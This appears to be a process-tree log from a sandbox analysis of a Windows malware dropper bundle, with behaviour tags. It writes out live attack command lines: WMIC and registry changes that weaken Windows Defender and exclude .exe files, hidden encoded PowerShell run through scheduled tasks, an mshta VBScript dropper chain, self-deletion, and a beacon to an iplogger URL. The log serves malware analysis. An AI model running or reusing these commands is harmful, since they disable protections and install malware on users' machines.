C:\Users\Admin\Documents\UqeNeCzEYzHh_NzaAB2UgDsH.exe"C:\Users\Admin\Documents\UqeNeCzEYzHh_NzaAB2UgDsH.exe"9⤵
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\Documents\GbT976WNIrFezJdOCBcbWAi7.exe"C:\Users\Admin\Documents\GbT976WNIrFezJdOCBcbWAi7.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpCD2_tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmpCD2_tmp.exe"9⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Users\Admin\AppData\Local\Temp\tmpCD2_tmp.exeC:\Users\Admin\AppData\Local\Temp\tmpCD2_tmp.exe10⤵
-
C:\Users\Admin\Documents\2TSNQ2xF4QX4VsNS94y7odig.exe"C:\Users\Admin\Documents\2TSNQ2xF4QX4VsNS94y7odig.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSFC38.tmp\Install.exe.\Install.exe9⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS184C.tmp\Install.exe.\Install.exe /S /site_id "668658"10⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &11⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True14⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"12⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True14⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True15⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"11⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"11⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&12⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3213⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6413⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gRGvtOeSZ" /SC once /ST 02:34:56 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="11⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOoGaaDxESFbryPOAb" /SC once /ST 03:45:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\xDbKBpA.exe\" tt /site_id 668658 /S" /V1 /F11⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\ynpFKcNZI9p6eFlM1OP158SD.exe"C:\Users\Admin\Documents\ynpFKcNZI9p6eFlM1OP158SD.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6324 -s 2609⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\f8PpilxAOrTr28KiG99opgqy.exe"C:\Users\Admin\Documents\f8PpilxAOrTr28KiG99opgqy.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6208 -s 2609⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\j9LG0SsntR5orv4gnEXhnbOy.exe"C:\Users\Admin\Documents\j9LG0SsntR5orv4gnEXhnbOy.exe"8⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\UZE7zKuIOHTqCGibtYD11gl4.exe"C:\Users\Admin\Documents\UZE7zKuIOHTqCGibtYD11gl4.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\DVqoN_M2hyOJuqKLhZl3Zhf2.exe"C:\Users\Admin\Documents\DVqoN_M2hyOJuqKLhZl3Zhf2.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1368 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\YZb540BezbbpKeaGGc138FrF.exe"C:\Users\Admin\Documents\YZb540BezbbpKeaGGc138FrF.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 17567⤵
- Program crash
-
C:\Users\Admin\Documents\QSydSxCGLaGDRZ1oU1LJVgeo.exe"C:\Users\Admin\Documents\QSydSxCGLaGDRZ1oU1LJVgeo.exe"6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Documents\Kj_AL68Sdj9h6SyuSSPAb3y6.exe"C:\Users\Admin\Documents\Kj_AL68Sdj9h6SyuSSPAb3y6.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\Documents\Kj_AL68Sdj9h6SyuSSPAb3y6.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Users\Admin\Documents\l6unBCJnlLRYEZSAupPv3hRP.exe"C:\Users\Admin\Documents\l6unBCJnlLRYEZSAupPv3hRP.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "210921.exe" & start "" "Done.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"7⤵
-
C:\Users\Admin\AppData\Local\Temp\210921.exe"210921.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\AppData\Local\Temp\Done.exe"Done.exe"8⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1aX5d7"8⤵
- Blocklisted process makes network request
-
C:\Users\Admin\Documents\98zXQtfds9_B8K1wkYwThy5h.exe"C:\Users\Admin\Documents\98zXQtfds9_B8K1wkYwThy5h.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5288 -s 2567⤵
- Program crash
-
C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt:CLoSe (cREATEobjEcT("WscRIpt.SHEll"). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If """" =="""" for %R IN ( ""C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe"" ) do taskkill -im ""%~nXR"" /f" ,0 , TRUE))7⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh &If "" =="" for %R IN ( "C:\Users\Admin\Documents\AshFb0VOpmlvVISw0CGgF3Vv.exe" ) do taskkill -im "%~nXR" /f8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -im "AshFb0VOpmlvVISw0CGgF3Vv.exe" /f9⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXEY1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh9⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vBScrIPt:CLoSe (cREATEobjEcT("WscRIpt.SHEll"). RUn ( "cMD.exe /q /c CoPY /Y ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh & If ""/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh "" =="""" for %R IN ( ""C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE"" ) do taskkill -im ""%~nXR"" /f" ,0 , TRUE))10⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /q /c CoPY /Y "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" Y1FUY5TJK7FR.EXE && STarT Y1Fuy5TjK7FR.eXe /pPcO7dQJSv4ebP1WI9YNCeWEF27pAh &If "/pPcO7dQJSv4ebP1WI9YNCeWEF27pAh " =="" for %R IN ( "C:\Users\Admin\AppData\Local\Temp\Y1FUY5TJK7FR.EXE" ) do taskkill -im "%~nXR" /f11⤵
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV112⤵
- Loads dropped DLL
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" Z~DYVRL.v,IzgdZv10⤵
- Loads dropped DLL
-
C:\Users\Admin\Documents\MHxCwq6gfFJ_wz0KxIaVUa5d.exe"C:\Users\Admin\Documents\MHxCwq6gfFJ_wz0KxIaVUa5d.exe"6⤵
-
C:\Users\Admin\Documents\msSZ2vyO5kijQfy3iLE0ayRx.exe"C:\Users\Admin\Documents\msSZ2vyO5kijQfy3iLE0ayRx.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"C:\Users\Admin\Documents\DyzW75Vg9OFYpumqyTL2gvjP.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6336 -s 10767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Documents\nKgSrPTMItcaLsJo4r1XrMq6.exe"C:\Users\Admin\Documents\nKgSrPTMItcaLsJo4r1XrMq6.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zSDCDE.tmp\Install.exe.\Install.exe7⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSF6CE.tmp\Install.exe.\Install.exe /S /site_id "394347"8⤵
- Checks BIOS information in registry
- Enumerates connected drives
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True"10⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True11⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True12⤵
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True13⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:3211⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:6411⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gfCVtwSxr" /SC once /ST 01:33:14 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bOoGaaDxESFbryPOAb" /SC once /ST 03:44:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\dQmOBORtOOmVIQYxa\XOLcDlHHxqomGEP\hBgiVyG.exe\" tt /site_id 394347 /S" /V1 /F9⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Documents\0JyVYnsjptsTZr1Bg5IXtXCy.exe"C:\Users\Admin\Documents\0JyVYnsjptsTZr1Bg5IXtXCy.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19262b9e49ad.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun19262b9e49ad.exeSun19262b9e49ad.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1168 -s 16646⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun193fda712d9f1.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun193fda712d9f1.exeSun193fda712d9f1.exe5⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun19e4ade31b2a.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zSC73583E0\Sun19e4ade31b2a.exeSun19e4ade31b2a.exe5⤵
-
